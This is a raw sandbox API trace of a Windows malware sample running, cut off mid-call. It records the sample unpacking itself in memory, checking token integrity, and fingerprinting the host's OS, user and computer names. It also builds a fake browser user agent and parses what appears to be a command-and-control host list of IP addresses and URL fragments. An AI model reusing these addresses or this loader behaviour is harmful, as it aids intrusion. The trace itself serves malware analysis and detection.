GetProcAddress (hModule=0x77130000, lpProcName="SetWaitableTimer") returned 0x77152ff0 [0307.962] GetProcAddress (hModule=0x77130000, lpProcName="Process32First") returned 0x77149140 [0307.963] GetProcAddress (hModule=0x77130000, lpProcName="WaitForSingleObject") returned 0x77153030 [0307.963] GetProcAddress (hModule=0x77130000, lpProcName="SleepEx") returned 0x77153000 [0307.963] GetProcAddress (hModule=0x77130000, lpProcName="CreateEventA") returned 0x77152e90 [0307.963] GetProcAddress (hModule=0x77130000, lpProcName="lstrlenW") returned 0x7714e010 [0307.963] GetProcAddress (hModule=0x77130000, lpProcName="GetLastError") returned 0x7714df70 [0307.963] GetProcAddress (hModule=0x77130000, lpProcName="GetProcAddress") returned 0x7714f4b0 [0307.963] GetProcAddress (hModule=0x77130000, lpProcName="Process32Next") returned 0x771478b0 [0307.963] GetProcAddress (hModule=0x77130000, lpProcName="WaitForMultipleObjects") returned 0x77153010 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="GetModuleHandleA") returned 0x771509c0 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="CreateToolhelp32Snapshot") returned 0x77154080 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="CloseHandle") returned 0x77152e40 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="CreateWaitableTimerA") returned 0x77147c30 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="lstrcpyA") returned 0x77148320 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="ResetEvent") returned 0x77152fd0 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="lstrcmpW") returned 0x771507e0 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="GetVersionExA") returned 0x771516c0 [0307.964] GetProcAddress (hModule=0x77130000, lpProcName="LoadLibraryA") returned 0x77150b30 [0307.965] GetProcAddress (hModule=0x77130000, lpProcName="FreeLibrary") returned 0x77150a40 [0307.965] GetProcAddress (hModule=0x77130000, lpProcName="EnterCriticalSection") returned 0x7787e820 [0307.965] GetProcAddress (hModule=0x77130000, lpProcName="LeaveCriticalSection") returned 0x7787dd40 [0307.965] GetProcAddress (hModule=0x77130000, lpProcName="InitializeCriticalSection") returned 0x7789ddb0 [0307.965] GetProcAddress (hModule=0x77130000, lpProcName="lstrcmpA") returned 0x7714f440 [0307.966] GetProcAddress (hModule=0x77130000, lpProcName="CreateFileMappingW") returned 0x77150400 [0307.966] GetProcAddress (hModule=0x77130000, lpProcName="MapViewOfFile") returned 0x7714f4f0 [0307.966] GetProcAddress (hModule=0x77130000, lpProcName="InterlockedExchange") returned 0x77142e40 [0307.966] GetProcAddress (hModule=0x77130000, lpProcName="ExpandEnvironmentStringsW") returned 0x77150e40 [0307.966] GetProcAddress (hModule=0x77130000, lpProcName="ExpandEnvironmentStringsA") returned 0x771522d0 [0307.970] GetProcAddress (hModule=0x77130000, lpProcName="QueryPerformanceFrequency") returned 0x77151640 [0307.970] GetProcAddress (hModule=0x77130000, lpProcName="OpenProcess") returned 0x77150590 [0307.970] GetProcAddress (hModule=0x77130000, lpProcName="GetVersion") returned 0x771518d0 [0307.970] GetProcAddress (hModule=0x77130000, lpProcName="GetCurrentProcessId") returned 0x77152df0 [0307.971] GetProcAddress (hModule=0x77130000, lpProcName="lstrcatA") returned 0x771489c0 [0307.971] GetProcAddress (hModule=0x77130000, lpProcName="QueryPerformanceCounter") returned 0x7714dea0 [0307.971] GetProcAddress (hModule=0x77130000, lpProcName="GetComputerNameW") returned 0x77151300 [0307.971] GetProcAddress (hModule=0x77130000, lpProcName="WideCharToMultiByte") returned 0x7714df50 [0307.971] GetProcAddress (hModule=0x77130000, lpProcName="GetComputerNameExA") returned 0x77163400 [0307.971] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76870000 [0309.840] GetProcAddress (hModule=0x76870000, lpProcName=0x2) returned 0x7688f9f0 [0309.840] GetProcAddress (hModule=0x76870000, lpProcName=0x10) returned 0x7688d130 [0309.841] GetProcAddress (hModule=0x76870000, lpProcName=0xf) returned 0x76888820 [0309.841] GetProcAddress (hModule=0x76870000, lpProcName=0x6) returned 0x7688ebb0 [0309.841] VirtualProtect (in: lpAddress=0x1e0000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x8bf904 | out: lpflOldProtect=0x8bf904*=0x40) returned 1 [0309.842] VirtualProtect (in: lpAddress=0x1e1000, dwSize=0x7773, flNewProtect=0x20, lpflOldProtect=0x8bf904 | out: lpflOldProtect=0x8bf904*=0x40) returned 1 [0309.868] VirtualProtect (in: lpAddress=0x1e9000, dwSize=0xf44, flNewProtect=0x2, lpflOldProtect=0x8bf904 | out: lpflOldProtect=0x8bf904*=0x40) returned 1 [0309.868] VirtualProtect (in: lpAddress=0x1ea000, dwSize=0x3e8, flNewProtect=0x4, lpflOldProtect=0x8bf904 | out: lpflOldProtect=0x8bf904*=0x40) returned 1 [0309.868] VirtualProtect (in: lpAddress=0x1eb000, dwSize=0xeaa, flNewProtect=0x4, lpflOldProtect=0x8bf904 | out: lpflOldProtect=0x8bf904*=0x40) returned 1 [0309.869] VirtualProtect (in: lpAddress=0x1ec000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x8bf904 | out: lpflOldProtect=0x8bf904*=0x40) returned 1 [0309.916] HeapCreate (flOptions=0x0, dwInitialSize=0x400000, dwMaximumSize=0x0) returned 0x2a70000 [0309.932] GetTickCount () returned 0x1e7f51d [0309.932] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1b0 [0309.932] GetVersion () returned 0x23f00206 [0309.932] GetCurrentProcessId () returned 0x1604 [0309.932] OpenProcess (dwDesiredAccess=0x10047a, bInheritHandle=0, dwProcessId=0x1604) returned 0x1b4 [0309.935] SwitchToThread () returned 1 [0309.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf8f0 | out: lpSystemTimeAsFileTime=0x8bf8f0*(dwLowDateTime=0xa631f1bc, dwHighDateTime=0x1d95b24)) [0309.938] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1000) returned 0x2e685b8 [0309.938] memcpy (in: _Dst=0x2e685b8, _Src=0x1eb000, _Size=0x1000 | out: _Dst=0x2e685b8) returned 0x2e685b8 [0309.973] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e685b8 | out: hHeap=0x2a70000) returned 1 [0310.002] Sleep (dwMilliseconds=0x6) [0310.028] SwitchToThread () returned 1 [0310.034] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf8f0 | out: lpSystemTimeAsFileTime=0x8bf8f0*(dwLowDateTime=0xa6403043, dwHighDateTime=0x1d95b24)) [0310.034] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1000) returned 0x2e685b8 [0310.034] memcpy (in: _Dst=0x2e685b8, _Src=0x1eb000, _Size=0x1000 | out: _Dst=0x2e685b8) returned 0x2e685b8 [0310.035] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e685b8 | out: hHeap=0x2a70000) returned 1 [0310.035] Sleep (dwMilliseconds=0x6) [0310.044] SwitchToThread () returned 1 [0310.044] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf8f0 | out: lpSystemTimeAsFileTime=0x8bf8f0*(dwLowDateTime=0xa6429092, dwHighDateTime=0x1d95b24)) [0310.044] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1000) returned 0x2e685b8 [0310.044] memcpy (in: _Dst=0x2e685b8, _Src=0x1eb000, _Size=0x1000 | out: _Dst=0x2e685b8) returned 0x2e685b8 [0310.044] Sleep (dwMilliseconds=0x18) [0310.091] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x77130000 [0310.091] GetProcAddress (hModule=0x77130000, lpProcName="IsWow64Process") returned 0x77150640 [0310.092] IsWow64Process (in: hProcess=0x1b4, Wow64Process=0x8bf8f8 | out: Wow64Process=0x8bf8f8*=1) returned 1 [0310.094] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77840000 [0310.094] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x775f0000 [0310.110] GetProcAddress (hModule=0x775f0000, lpProcName="CoInitializeEx") returned 0x765101c0 [0310.110] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0310.475] NtOpenProcess (in: ProcessHandle=0x8bf894, DesiredAccess=0x400, ObjectAttributes=0x8bf874*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x8bf88c*(UniqueProcess=0x1604, UniqueThread=0x0) | out: ProcessHandle=0x8bf894*=0x1ec) returned 0x0 [0310.475] NtOpenProcessToken (in: ProcessHandle=0x1ec, DesiredAccess=0x8, TokenHandle=0x8bf898 | out: TokenHandle=0x8bf898*=0x1f0) returned 0x0 [0310.475] NtQueryInformationToken (in: TokenHandle=0x1f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x8bf8a4 | out: TokenInformation=0x0, ReturnLength=0x8bf8a4) returned 0xc0000023 [0310.475] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x24) returned 0x2e695c0 [0310.475] NtQueryInformationToken (in: TokenHandle=0x1f0, TokenInformationClass=0x1, TokenInformation=0x2e695c0, TokenInformationLength=0x24, ReturnLength=0x8bf8a4 | out: TokenInformation=0x2e695c0, ReturnLength=0x8bf8a4) returned 0x0 [0310.475] memcpy (in: _Dst=0x8bf8b8, _Src=0x2e695c8, _Size=0x1c | out: _Dst=0x8bf8b8) returned 0x8bf8b8 [0310.476] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e695c0 | out: hHeap=0x2a70000) returned 1 [0310.476] NtClose (Handle=0x1f0) returned 0x0 [0310.476] NtClose (Handle=0x1ec) returned 0x0 [0310.476] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76390000 [0310.476] GetProcAddress (hModule=0x76390000, lpProcName="OpenProcessToken") returned 0x763adf20 [0310.477] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x8bf898 | out: TokenHandle=0x8bf898*=0x1ec) returned 1 [0310.477] GetProcAddress (hModule=0x76390000, lpProcName="GetTokenInformation") returned 0x763adb80 [0310.477] GetTokenInformation (in: TokenHandle=0x1ec, TokenInformationClass=0x14, TokenInformation=0x8bf894, TokenInformationLength=0x4, ReturnLength=0x8bf89c | out: TokenInformation=0x8bf894, ReturnLength=0x8bf89c) returned 1 [0310.477] GetProcAddress (hModule=0x76390000, lpProcName="GetTokenInformation") returned 0x763adb80 [0310.477] GetTokenInformation (in: TokenHandle=0x1ec, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x8bf89c | out: TokenInformation=0x0, ReturnLength=0x8bf89c) returned 0 [0310.477] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x14) returned 0x2e695c0 [0310.477] GetProcAddress (hModule=0x76390000, lpProcName="GetTokenInformation") returned 0x763adb80 [0310.477] GetTokenInformation (in: TokenHandle=0x1ec, TokenInformationClass=0x19, TokenInformation=0x2e695c0, TokenInformationLength=0x14, ReturnLength=0x8bf89c | out: TokenInformation=0x2e695c0, ReturnLength=0x8bf89c) returned 1 [0310.477] GetProcAddress (hModule=0x76390000, lpProcName="GetSidSubAuthorityCount") returned 0x763ae680 [0310.477] GetSidSubAuthorityCount (pSid=0x2e695c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2e695c9 [0310.478] GetProcAddress (hModule=0x76390000, lpProcName="GetSidSubAuthority") returned 0x763ae520 [0310.478] GetSidSubAuthority (pSid=0x2e695c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2e695d0 [0310.478] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e695c0 | out: hHeap=0x2a70000) returned 1 [0310.478] CloseHandle (hObject=0x1ec) returned 1 [0310.478] GetProcAddress (hModule=0x76390000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x763b3be0 [0310.478] ConvertStringSecurityDescriptorToSecurityDescriptorA (in: StringSecurityDescriptor="S:(ML;;NW;;;LW)D:(A;;0x1fffff;;;WD)(A;;0x1fffff;;;S-1-15-2-1)(A;;0x1fffff;;;S-1-15-3-1)", StringSDRevision=0x1, SecurityDescriptor=0x1ea350, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x1ea350*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8014, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x14, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x30), Sacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x30, Sbz2=0x0), Dacl=0x30*(AclRevision=0x30, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x1c)), SecurityDescriptorSize=0x0) returned 1 [0310.478] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf8cc | out: lpSystemTimeAsFileTime=0x8bf8cc*(dwLowDateTime=0xa682f0c6, dwHighDateTime=0x1d95b24)) [0310.478] _snwprintf (in: _Dest=0x8bf8a0, _Count=0x16, _Format="%S%x" | out: _Dest="Local\\12d31") returned 11 [0310.478] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x1ea34c, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1000, lpName="Local\\12d31") returned 0x1ec [0310.478] GetLastError () returned 0xb7 [0310.478] MapViewOfFile (hFileMappingObject=0x1ec, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x580000 [0310.479] CloseHandle (hObject=0x1ec) returned 1 [0310.479] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x42) returned 0x2e695c0 [0310.479] GetVersionExA (in: lpVersionInformation=0x8bf83c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x1ec, dwMinorVersion=0xffffffff, dwBuildNumber=0x8bf878, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x8bf83c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0310.479] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75750000 [0310.479] GetProcAddress (hModule=0x75750000, lpProcName="wsprintfA") returned 0x757758d0 [0310.479] wsprintfA (in: param_1=0x2e695c0, param_2="%u.%u_%u_%u_x%u" | out: param_1="10.0_0_0_x64") returned 12 [0310.480] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x60) returned 0x2e69610 [0310.480] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x43) returned 0x2e69678 [0310.480] wsprintfA (in: param_1=0x2e69678, param_2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)" | out: param_1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)") returned 51 [0310.480] GetProcAddress (hModule=0x76390000, lpProcName="GetUserNameW") returned 0x763ae800 [0310.480] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x8bf8d4 | out: lpBuffer=0x0, pcbBuffer=0x8bf8d4) returned 0 [0310.552] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x14) returned 0x2e696c8 [0310.552] GetUserNameW (in: lpBuffer=0x2e696c8, pcbBuffer=0x8bf8d4 | out: lpBuffer="OqXZRaykm", pcbBuffer=0x8bf8d4) returned 1 [0310.552] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e696c8 | out: hHeap=0x2a70000) returned 1 [0310.552] GetComputerNameW (in: lpBuffer=0x0, nSize=0x8bf8d4 | out: lpBuffer=0x0, nSize=0x8bf8d4) returned 0 [0310.552] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x16) returned 0x2e696c8 [0310.552] GetComputerNameW (in: lpBuffer=0x2e696c8, nSize=0x8bf8d4 | out: lpBuffer="PXTHFFRYO7", nSize=0x8bf8d4) returned 1 [0310.552] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e696c8 | out: hHeap=0x2a70000) returned 1 [0310.552] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x111) returned 0x2e696c8 [0310.552] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1dc) returned 0x2e697e8 [0310.552] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1a0) returned 0x2e699d0 [0310.552] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76410000 [0311.058] GetProcAddress (hModule=0x76410000, lpProcName="StrToIntExA") returned 0x7642b000 [0311.059] StrToIntExA (in: pszString="1", dwFlags=0x0, piRet=0x8bf8d4 | out: piRet=0x8bf8d4) returned 1 [0311.060] GetProcAddress (hModule=0x76410000, lpProcName="StrToIntExA") returned 0x7642b000 [0311.060] StrToIntExA (in: pszString="20", dwFlags=0x0, piRet=0x8bf8d4 | out: piRet=0x8bf8d4) returned 1 [0311.060] GetProcAddress (hModule=0x76410000, lpProcName="StrToIntExA") returned 0x7642b000 [0311.060] StrToIntExA (in: pszString="0", dwFlags=0x0, piRet=0x8bf8d4 | out: piRet=0x8bf8d4) returned 1 [0311.060] GetProcAddress (hModule=0x76410000, lpProcName="StrToIntExA") returned 0x7642b000 [0311.060] StrToIntExA (in: pszString="7715", dwFlags=0x0, piRet=0x8bf8d4 | out: piRet=0x8bf8d4) returned 1 [0311.060] GetProcAddress (hModule=0x76410000, lpProcName="StrToIntExA") returned 0x7642b000 [0311.060] StrToIntExA (in: pszString="50", dwFlags=0x0, piRet=0x8bf8d4 | out: piRet=0x8bf8d4) returned 1 [0311.060] GetProcAddress (hModule=0x76410000, lpProcName="StrToIntExA") returned 0x7642b000 [0311.060] StrToIntExA (in: pszString="0", dwFlags=0x0, piRet=0x8bf8d4 | out: piRet=0x8bf8d4) returned 1 [0311.060] lstrlenA (lpString="xeaLJj1BwSDpjIfH") returned 16 [0311.060] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x11) returned 0x2e69b78 [0311.061] memcpy (in: _Dst=0x2e69b78, _Src=0x2e69b55, _Size=0x10 | out: _Dst=0x2e69b78) returned 0x2e69b78 [0311.061] lstrlenA (lpString="checklist.skype.com 62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7") returned 91 [0311.061] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x5c) returned 0x2e69b98 [0311.061] memcpy (in: _Dst=0x2e69b98, _Src=0x2e69ae0, _Size=0x5b | out: _Dst=0x2e69b98) returned 0x2e69b98 [0311.061] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.061] StrChrA (lpStart="checklist.skype.com 62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7" [0311.061] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.061] StrChrA (lpStart="62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7" [0311.061] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.061] StrChrA (lpStart="193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 109.248.11.184 212.109.218.26 185.68.93.7" [0311.062] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.062] StrChrA (lpStart="109.248.11.184 212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 212.109.218.26 185.68.93.7" [0311.062] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.062] StrChrA (lpStart="212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 185.68.93.7" [0311.062] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.062] StrChrA (lpStart="185.68.93.7", wMatch=0x20) returned 0x0 [0311.062] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x18) returned 0x2e69c00 [0311.062] GetProcAddress (hModule=0x76410000, lpProcName="StrTrimA") returned 0x7642b040 [0311.062] StrTrimA (in: psz="checklist.skype.com 62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7", pszTrimChars=" \x09" | out: psz="checklist.skype.com 62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7") returned 0 [0311.063] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.063] StrChrA (lpStart="checklist.skype.com 62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7" [0311.063] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.063] StrChrA (lpStart="62.173.142.81 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7" [0311.063] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.063] StrChrA (lpStart="193.233.175.113 109.248.11.184 212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 109.248.11.184 212.109.218.26 185.68.93.7" [0311.063] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.064] StrChrA (lpStart="109.248.11.184 212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 212.109.218.26 185.68.93.7" [0311.064] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.064] StrChrA (lpStart="212.109.218.26 185.68.93.7", wMatch=0x20) returned=" 185.68.93.7" [0311.064] GetProcAddress (hModule=0x76410000, lpProcName="StrChrA") returned 0x7642ab80 [0311.064] StrChrA (lpStart="185.68.93.7", wMatch=0x20) returned 0x0 [0311.064] lstrlenA (lpString="/drew/") returned 6 [0311.064] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x7) returned 0x2e69c20 [0311.064] memcpy (in: _Dst=0x2e69c20, _Src=0x2e69b3c, _Size=0x6 | out: _Dst=0x2e69c20) returned 0x2e69c20 [0311.064] lstrlenA (lpString=".jlk") returned 4 [0311.064] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x5) returned 0x2e69c30 [0311.064] memcpy (in: _Dst=0x2e69c30, _Src=0x2e69b43, _Size=0x4 | out: _Dst=0x2e69c30) returned 0x2e69c30 [0311.064] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e699d0 | out: hHeap=0x2a70000) returned 1 [0311.065] HeapFree (in: hHeap=0x2a70000, dwFlags=0x0, lpMem=0x2e697e8 | out: hHeap=0x2a70000) returned 1 [0311.065] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1dc) returned 0x2e697e8 [0311.065] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x1dc) returned 0x2e69c40 [0311.065] RtlAllocateHeap (HeapHandle=0x2a70000, Flags=0x0, Size=0x5db) returned 0x2e69e28 [0311.065] lstrcpyA (in: lpString1=0x2e69f2c, lpString2="Operator" | out: lpString1="Operator") returned="Operator" [0311.065] lstrcatA (in: lpString1="Operator", lpString2="Core" | out: lpString1="OperatorCore") returned="OperatorCore" [0311.065] lstrlenA (lpString="OperatorCore") returned 12 [0311.065] lstrcpyA (in: lpString1=0x2e69f39, lpString2="Util" | out: lpString1="Util") returned="Util" [0311.065] lstrcatA (in: lpString1="Util", lpString2="Start" | out: lpString1="UtilStart") returned="UtilStart" [0311.065] lstrcmpA (lpString1="OperatorCore", lpString2="UtilStart") returned -1 [0311.082] lstrlenA (lpString="UtilStart") returned 9 [0311.083] lstrcpyA (in: lpString1=0x2e69f43, lpString2="Stop" | out: lpString1="Stop") returned="Stop" [0311.083] lstrcatA (in: lpString1="Stop", lpString2="Line" | out: lpString1="StopLine") returned="StopLine" [0311.083] lstrcmpA (lpString1="OperatorCore", lpString2="StopLine") returned -1 [0311.083] lstrcmpA (lpString1="UtilStart", lpString2="StopLine") returned 1 [0311.083] lstrlenA (lpString="StopLine") returned 8 [0311.083] lstrcpyA (in: lpString1=0x2e69f4c, lpString2="Chip" | out: lpString1="Chip") returned="Chip" [0311.083] lstrcatA (in: lpString1="Chip", lpString2="Mark" | out: lpString1="ChipMark") returned="ChipMark" [0311.083] lstrcmpA (lpString1="OperatorCore", lpString2="ChipMark") returned 1 [0311.083] lstrcmpA (lpString1="UtilStart", lpString2="ChipMark") returned 1 [0311.083] lstrcmpA (lpString1="StopLine", lpString2="ChipMark") returned 1 [0311.083] lstrlenA (lpString="ChipMark") returned 8 [0311.083] lstrcpyA (in: lpString1=0x2e69f55, lpString2="Util" | out: lpString1="Util") returned="Util" [0311.083] lstrcatA (in: lpString1="Util", lpString2="Pack" | out: lpString1="UtilPack") returned="UtilPack" [0311.083] lstrcmpA (lpString1="OperatorCore", lpString2="UtilPack") returned -1 [0311.083] lstrcmpA (lpString1="UtilStart", lpString2="UtilPack") returned 1 [0311.083] lstrcmpA (lpString1="StopLine", lpString2="UtilPack") returned -1 [0311.083] lstrcmpA (lpString1="ChipMark", lpString2="UtilPack") returned -1 [0311.084] lstrlenA (lpString="UtilPack") returned 8 [0311.084] lstrcpyA (in: lpString1=0x2e69f5e, lpString2="Sheet" | out: lpString1="Sheet") returned="Sheet" [0311.084] lstrcatA (in: lpString1="Sheet", lpString2="Value" | out: lpString1="SheetValue") returned="SheetValue" [0311.084] lstrcmpA (lpString1="OperatorCore", lpString2="SheetValue") returned -1 [0311.084] lstrcmpA (lpString1="UtilStart", lpString2="SheetValue") returned 1 [0311.084] lstrcmpA (lpString1="StopLine", lpString2="SheetValue") returned 1 [0311.084] lstrcmpA (lpString1="ChipMark", lpString2="SheetValue") returned -1 [0311.084] lstrcmpA (lpString1="UtilPack", lpString2="SheetValue") returned 1 [0311.084] lstrlenA (lpString="SheetValue") returned 10 [0311.084] lstrcpyA (in: lpString1=0x2e69f69, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0311.084] lstrcatA (in: lpString1="Settings", lpString2="White" | out: lpString1="SettingsWhite") returned="SettingsWhite" [0311.084] lstrcmpA (lpString1="OperatorCore", lpString2="SettingsWhite") returned -1 [0311.084] lstrcmpA (lpString1="UtilStart", lpString2="SettingsWhite") returned 1 [0311.084] lstrcmpA (lpString1="StopLine", lpString2="SettingsWhite") returned 1 [0311.084] lstrcmpA (lpString1="ChipMark", lpString2="SettingsWhite") returned -1 [0311.084] lstrcmpA (lpString1="UtilPack", lpString2="SettingsWhite") returned 1 [0311.084] lstrcmpA (lpString1="SheetValue", lpString2="SettingsWhite") returned 1 [0311.084] lstrlenA (lpString="SettingsWhite") returned 13 [0311.084] lstrcpyA (in: lpString1=0x2e69f77, lpString2="Control" | out: lpString1="Control") returned="Control" [0311.085] lstrcatA (in: lpString1="Control", lpString2="Time" | out: lpString1="ControlTime") returned="ControlTime" [0311.085] lstrcmpA (lpString1="OperatorCore", lpString2="ControlTime") returned 1 [0311.085] lstrcmpA (lpString1="UtilStart", lpString2="ControlTime") returned 1 [0311.085] lstrcmpA (lpString1="StopLine", lpString2="ControlTime") returned 1 [0311.085] lstrcmpA (lpString1="ChipMark", lpString2="ControlTime") returned -1 [0311.085] lstrcmpA (lpString1="UtilPack", lpString2="ControlTime") returned 1 [0311.085] lstrcmpA (lpString1="SheetValue", lpString2="ControlTime") returned 1 [0311.085] lstrcmpA (lpString1="SettingsWhite", lpString2="ControlTime") returned 1 [0311.085] lstrlenA (lpString="ControlTime") returned 11 [0311.085] lstrcpyA (in: lpString1=0x2e69f83, lpString2="Document" | out: lpString1="Document") returned="Document" [0311.085] lstrcatA (in: lpString1="Document", lpString2="Link" | out: lpString1="DocumentLink") returned="DocumentLink" [0311.085] lstrcmpA (lpString1="OperatorCore", lpString2="DocumentLink") returned 1 [0311.085] lstrcmpA (lpString1="UtilStart", lpString2="DocumentLink") returned 1 [0311.085] lstrcmpA (lpString1="StopLine", lpString2="DocumentLink") returned 1 [0311.085] lstrcmpA (lpString1="ChipMark", lpString2="DocumentLink") returned -1 [0311.085] lstrcmpA (lpString1="UtilPack", lpString2="DocumentLink") returned 1 [0311.085] lstrcmpA (lpString1="SheetValue", lpString2="DocumentLink") returned 1 [0311.085] lstrcmpA (lpString1="SettingsWhite", lpString2="DocumentLink") returned 1 [0311.085] lstrcmpA 